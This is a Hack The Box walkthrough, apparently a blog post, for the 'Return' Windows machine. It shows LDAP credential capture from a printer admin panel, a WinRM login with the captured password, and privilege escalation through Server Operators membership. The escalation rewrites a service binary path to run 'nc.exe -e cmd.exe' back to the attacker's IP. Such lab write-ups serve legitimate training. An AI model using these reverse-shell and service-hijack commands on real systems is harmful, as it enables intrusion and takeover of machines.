return - hack the box

We will be checking out Return, an easy rated Windows machine on HackTheBox which was released in 2021.

https://app.hackthebox.com/machines/Return

A network printer administration panel stores LDAP credentials. These credentials can be captured by inputting a malicious LDAP server which allows obtaining foothold on the server through the WinRM service. User found to be part of a privilege group which further exploited to gain system access.

Target IP: 10.129.95.241 Attacker IP: 10.10.14.92

Enumeration

nmap -sCVS 10.129.95.241

53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 21:36:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-06T21:36:53
|_  start_date: N/A
|_clock-skew: 18m29s

From this scan we can tell that our target is Windows based.

Lets check out the http web page.

HTB Printer Admin Panel

alt text

We are brought to a printer admin panel. Upon investigating the menu we find some interesting credentials in the settings.

alt text

It looks like we have some form of credentials, the server port is 389 so this is the targets LDAP service.

svc-printer credential leak

In the settings tab we are allowed to edit the server address. We put our own IP in this field and start up a listener to see what information we receive.

alt text

LDAP, by default, can use a simple bind operation for authentication, which sends the user’s password in plain text over the network. In this case we are able to intercept credentials since we were able to modify the server address to return to our listener.

Lets see if these credentials work with evil-winrm

svc-printer:1edFg43012 !!

evil-winrm -i 10.129.95.241 -u 'svc-printer' -p '1edFg43012!!'

alt text

We are in!

User Enumeration

alt text

With evilwin-rm I love to use the upload feature. I’m just going to upload winPEASx64 and have it run in the background while I manually enumerate.

alt text

The Server Operators group is a built-in security group in Windows Server environments.

svc-printer is in the Server Operators group. This group allows svc-printer to have administrative privileges to perform server-related tasks without having full administrative rights.

This is a nice article I found with some possible exploits to abuse when a user is in the Server Operators group: https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

Privilege Escalation

Lets take note of the services running on this machine


Path                                                                                                                 Privileges Service          
----                                                                                                                 ---------- -------          
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                                                                  True ADWS             
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys       True MpKslceeb2796    
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                              True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe                                                                                           True PerfHost         
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                False Sense            
C:\Windows\servicing\TrustedInstaller.exe                                                                                 False TrustedInstaller 
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                     True VGAuthService    
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"                                                                        True VMTools          
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"                                             True WdNisSvc         
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"                                            True WinDefend        
"C:\Program Files\Windows Media Player\wmpnetwk.exe"                                                                      False WMPNetworkSvc

Lets try an abuse VMTools.

Firstly we will upload nc.exe via evil-winrm

upload nc.exe

Next lets edit the binary path of VMTools so it starts up a netcat session pointed to our listener

sc.exe config VMTools binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.92 4444"

Make sure to set up your listener on your attacking machine.

alt text

Finally, lets stop and start the VMTools service

sc.exe stop VMTools

sc.exe start VMTools

We capture a session and we have SYSTEM access! pwned

alt text

 

pwnand.win

2025-07-02

On this page: